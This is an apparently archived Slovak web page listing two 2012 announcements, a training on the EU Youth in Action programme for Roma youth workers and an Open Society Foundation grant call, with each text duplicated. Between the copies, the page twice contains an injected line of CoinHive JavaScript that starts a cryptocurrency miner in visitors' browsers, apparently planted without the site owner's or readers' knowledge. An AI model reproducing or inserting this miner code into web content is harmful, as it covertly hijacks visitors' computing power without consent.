Category Archives: Ľudské práva

Home / Archive by category "Ľudské práva"

Školenie: „Roming“ – rozvoj rómskej mládeže prostredníctvom programu Mládež v akcii

Miesto konania: miesto bude upresnené vybraným uchádzačom

Termín:11. 5. – 13. 5. 2012

Uzávierka prihlášok: 1. máj 2012

Typ aktivity: školenie

Krátka charakteristika:

Školenie je určené pre rómsku mládež alebo pracovníkov s rómskou mládežou. Vďaka školeniu budú mať účastníci možnosť oboznámiť sa s programom Mládež v akcii a zistiť, aké možnosti sa im ponúkajú.

Ciele aktivity:

  • motivovať účastníkov k príprave projektov v rámci programu Mládež v akcii;
  • oboznámiť účastníkov s oblasťou neformálneho vzdelávania a jej prínosu v rámci osobnostného rozvoja;
  • sprostredkovať zručnosti a vedomosti potrebné k príprave a realizácii kvalitných projektov všeobecne a špecificky so zameraním na Akcie 1.1 Mládežnícke výmeny a 1.2 Mládežnícke iniciatívy.

Pracovný jazyk: slovenčina

 Cieľová skupina:
rómski asistenti učiteľa, pracovníci s rómskou mládežou, rómski mladí a mládežnícki vedúci

Počet účastníkov: max. 30

Náklady spojené s účasťou na školení:

Ubytovanie a strava sú hradené z prostriedkov programu EÚ Mládež v akcii. Účastník si hradí z vlastných nákladov cestovné náklady z/na miesto konania školenia. V prípade, že sa jedná o mladých ľudí s nedostatkom príležitostí (zlá ekonomická situácia a pod.), prosíme, kontaktujte nižšie uvedenú kontaktnú osobu.

Kontaktná osoba:

Mgr.Lucia Király Csajka(IUVENTA)

tel.: (421-2) 59 29 63 24
m.t.: (421-908) 67 88 09
e-mail: lucia.kiralycsajka@iuventa.sk

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Školenie: „Roming“ – rozvoj rómskej mládeže prostredníctvom programu Mládež v akcii

Miesto konania: miesto bude upresnené vybraným uchádzačom

Termín:11. 5. – 13. 5. 2012

Uzávierka prihlášok: 1. máj 2012

Typ aktivity: školenie

Krátka charakteristika:

Školenie je určené pre rómsku mládež alebo pracovníkov s rómskou mládežou. Vďaka školeniu budú mať účastníci možnosť oboznámiť sa s programom Mládež v akcii a zistiť, aké možnosti sa im ponúkajú.

Ciele aktivity:

  • motivovať účastníkov k príprave projektov v rámci programu Mládež v akcii;
  • oboznámiť účastníkov s oblasťou neformálneho vzdelávania a jej prínosu v rámci osobnostného rozvoja;
  • sprostredkovať zručnosti a vedomosti potrebné k príprave a realizácii kvalitných projektov všeobecne a špecificky so zameraním na Akcie 1.1 Mládežnícke výmeny a 1.2 Mládežnícke iniciatívy.

Pracovný jazyk: slovenčina

 Cieľová skupina:
rómski asistenti učiteľa, pracovníci s rómskou mládežou, rómski mladí a mládežnícki vedúci

Počet účastníkov: max. 30

Náklady spojené s účasťou na školení:

Ubytovanie a strava sú hradené z prostriedkov programu EÚ Mládež v akcii. Účastník si hradí z vlastných nákladov cestovné náklady z/na miesto konania školenia. V prípade, že sa jedná o mladých ľudí s nedostatkom príležitostí (zlá ekonomická situácia a pod.), prosíme, kontaktujte nižšie uvedenú kontaktnú osobu.

Kontaktná osoba:

Mgr.Lucia Király Csajka(IUVENTA)

tel.: (421-2) 59 29 63 24
m.t.: (421-908) 67 88 09
e-mail: lucia.kiralycsajka@iuventa.sk

Res Publica 2012 – grantová výzva

Nadácia otvorenej spoločnosti – Open Society Foundation (NOS-OSF) vyhlasuje grantový program Res publica 2012 zameraný na zapojenie mimovládnych organizácií do riešenia problémov znevýhodnených skupín a presadzovanie nediskriminácie a tolerancie.

V grantovom kole sa mozu mimovladne organizacie uchadzat o ziskanie financnej podpory vo vyske 13 000 €. Podrobnejsie informacie najdete v prilozenej vyzve a na nasej web stranke:
http://www.osf.sk/novinky/grantova_vyzva_res_publica_2012/.

Uzavierka grantoveho kola je v piatok 13. aprila 2012 . V pripade otazok prosim kontaktujte projektove manazerky na ich emailovych adresach: Valentinu Petrus: valentina@osf.sk alebo Viktoriu Mlynarcikovu: viktoria@osf.sk

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Res Publica 2012 – grantová výzva

Nadácia otvorenej spoločnosti – Open Society Foundation (NOS-OSF) vyhlasuje grantový program Res publica 2012 zameraný na zapojenie mimovládnych organizácií do riešenia problémov znevýhodnených skupín a presadzovanie nediskriminácie a tolerancie.

V grantovom kole sa mozu mimovladne organizacie uchadzat o ziskanie financnej podpory vo vyske 13 000 €. Podrobnejsie informacie najdete v prilozenej vyzve a na nasej web stranke:
http://www.osf.sk/novinky/grantova_vyzva_res_publica_2012/.

Uzavierka grantoveho kola je v piatok 13. aprila 2012 . V pripade otazok prosim kontaktujte projektove manazerky na ich emailovych adresach: Valentinu Petrus: valentina@osf.sk alebo Viktoriu Mlynarcikovu: viktoria@osf.sk